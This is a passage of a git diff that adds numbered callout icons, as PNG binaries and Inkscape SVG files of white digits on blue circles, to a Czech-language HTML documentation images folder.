-1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/39.png b/tmp/cs-CZ/html/Common_Content/images/39.png
new file mode 100644
index 000000000..d6894500c
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/39.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/39.svg b/tmp/cs-CZ/html/Common_Content/images/39.svg
new file mode 100644
index 000000000..cea69f715
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/39.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/4.png b/tmp/cs-CZ/html/Common_Content/images/4.png
new file mode 100644
index 000000000..f6c113563
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/4.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/4.svg b/tmp/cs-CZ/html/Common_Content/images/4.svg
new file mode 100644
index 000000000..3b537d4a1
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/4.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 20.078077,19.493301 -1.460937,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460937,0 0,1.992187 m -3.959472,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09962,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.12175,0.2601 -0.262863,0.520191 -0.42334,0.780274 l -2.025391,3.071289 2.75586,0"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/40.png b/tmp/cs-CZ/html/Common_Content/images/40.png
new file mode 100644
index 000000000..0d3532e0f
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/40.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/40.svg b/tmp/cs-CZ/html/Common_Content/images/40.svg
new file mode 100644
index 000000000..bb4e1d7b8
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/40.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.440535,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.0136719,0 0,-1.784668 5.1547849,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262863,0.520191 -0.42334,0.780274 l -2.0253904,3.071289 2.7558594,0"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/5.png b/tmp/cs-CZ/html/Common_Content/images/5.png
new file mode 100644
index 000000000..4ced5472d
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/5.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/5.svg b/tmp/cs-CZ/html/Common_Content/images/5.svg
new file mode 100644
index 000000000..ec2715dea
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/5.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 16.035597,14.255508 c 0.520177,8e-6 1.004388,0.08025 1.452637,0.240723 0.448235,0.160489 0.838371,0.395678 1.17041,0.705566 0.332023,0.309903 0.592114,0.697272 0.780273,1.16211 0.188143,0.459315 0.282218,0.987797 0.282227,1.585449 -9e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.204761,0.520184 -0.506356,0.962892 -0.904785,1.328125 -0.398445,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261724,0.290528 -2.025391,0.290528 -0.304365,0 -0.60596,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863281,-0.124512 -0.271161,-0.04981 -0.531252,-0.116211 -0.780274,-0.199219 -0.24349,-0.08301 -0.464844,-0.17985 -0.664062,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672363,0.31543 0.254556,0.09408 0.517414,0.177086 0.788574,0.249024 0.276691,0.06641 0.553383,0.121746 0.830078,0.166015 0.27669,0.03874 0.539548,0.05811 0.788575,0.05811 0.741532,2e-6 1.305984,-0.152179 1.693359,-0.456543 0.387364,-0.309893 0.581049,-0.799639 0.581055,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751465,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320966,0.03874 -0.481445,0.06641 -0.154951,0.02768 -0.304365,0.05811 -0.448242,0.09131 -0.143883,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456542,-6.1840821 6.408204,0 0,2.1748051 -4.183594,0 -0.199219,2.382324 c 0.17708,-0.03873 0.381832,-0.07747 0.614258,-0.116211 0.237951,-0.03873 0.542313,-0.0581 0.913086,-0.05811"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/6.png b/tmp/cs-CZ/html/Common_Content/images/6.png
new file mode 100644
index 000000000..22fc272c0
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/6.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/6.svg b/tmp/cs-CZ/html/Common_Content/images/6.svg
new file mode 100644
index 000000000..b80629368
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/6.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 11.702589,16.853653 c -10e-7,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.0664,-0.575514 0.179849,-1.126132 0.340332,-1.651856 0.166014,-0.531241 0.387368,-1.023753 0.664062,-1.477539 0.282225,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431638,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603186,-0.1936727 1.305984,-0.2905151 2.108399,-0.2905274 0.116204,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.138339,0.00555 0.276685,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251782,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210295,-0.04979 -0.434416,-0.08853 -0.672364,-0.116211 -0.232429,-0.03319 -0.467617,-0.04979 -0.705566,-0.0498 -0.747076,1e-5 -1.361334,0.09408 -1.842774,0.282226 -0.481449,0.182627 -0.863285,0.439951 -1.145507,0.771973 -0.28223,0.33204 -0.484216,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.215821,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243486,-0.384596 0.398437,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556153,-0.448242 0.210282,-0.127271 0.44547,-0.22688 0.705566,-0.298828 0.26562,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419433,0.257324 0.420566,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.15494,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282226,1.768066 -0.182626,0.520184 -0.445484,0.962892 -0.788575,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643554,0.282227 -0.597661,0 -1.15658,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.973961,-0.542317 -1.361328,-0.979492 -0.381838,-0.437173 -0.683433,-0.987791 -0.904785,-1.651856 -0.215822,-0.669593 -0.323732,-1.460933 -0.323731,-2.374023 m 4.216797,3.270508 c 0.226883,2e-6 0.431635,-0.0415 0.614258,-0.124512 0.188145,-0.08854 0.348627,-0.218585 0.481445,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.31543,-0.664062 0.07747,-0.265622 0.116204,-0.581051 0.116211,-0.946289 -7e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243496,-0.343094 -0.617031,-0.514643 -1.120606,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.39014,0.229661 -0.53955,0.390137 -0.149418,0.160487 -0.265629,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.31543,0.755371 0.143876,0.221357 0.318193,0.401207 0.522949,0.539551 0.210282,0.138349 0.453772,0.207522 0.730469,0.20752"
+       id="path2846"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/7.png b/tmp/cs-CZ/html/Common_Content/images/7.png
new file mode 100644
index 000000000..9b1f20a98
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/7.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/7.svg b/tmp/cs-CZ/html/Common_Content/images/7.svg
new file mode 100644
index 000000000..871e0eff7
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/7.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 12.789991,22.008438 4.316407,-9.960937 -5.578125,0 0,-2.1582035 8.367187,0 0,1.6103515 -4.424316,10.508789 -2.681153,0"
+       id="path2832"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/8.png b/tmp/cs-CZ/html/Common_Content/images/8.png
new file mode 100644
index 000000000..ac38ae5bf
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/8.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/8.svg b/tmp/cs-CZ/html/Common_Content/images/8.svg
new file mode 100644
index 000000000..10e612f6e
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/8.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.761671,9.7149811 c 0.503576,1.23e-5 0.979487,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337558,0.243501 0.60595,0.547862 0.805176,0.913086 0.199211,0.365244 0.29882,0.794118 0.298828,1.286621 -8e-6,0.365243 -0.05535,0.697274 -0.166015,0.996094 -0.110686,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193693,0.237963 -0.423348,0.451017 -0.688965,0.639161 -0.265632,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.633619,0.362473 0.937988,0.572754 0.309888,0.210292 0.583814,0.448247 0.821777,0.713867 0.237948,0.260096 0.428866,0.55339 0.572754,0.879883 0.143872,0.326501 0.215812,0.691735 0.21582,1.095703 -8e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478686,0.758139 -0.838379,1.045898 -0.359707,0.287761 -0.791348,0.509115 -1.294921,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651856,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.93799,-0.362467 -1.286621,-0.639161 -0.348634,-0.276691 -0.614259,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265626,-0.857744 -0.265625,-1.361328 -10e-7,-0.415035 0.06087,-0.78857 0.182617,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498047,-0.896485 0.210285,-0.265619 0.456541,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271162,-0.171543 -0.525719,-0.356927 -0.763672,-0.556152 -0.237958,-0.204746 -0.445477,-0.428866 -0.622559,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -10e-7,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478677,-0.669585 0.821778,-0.913086 0.343096,-0.249012 0.738766,-0.434396 1.187011,-0.5561527 0.448239,-0.1217326 0.918616,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.107911,0.614258 0.07194,0.18262 0.17708,0.340334 0.315429,0.473145 0.143877,0.132814 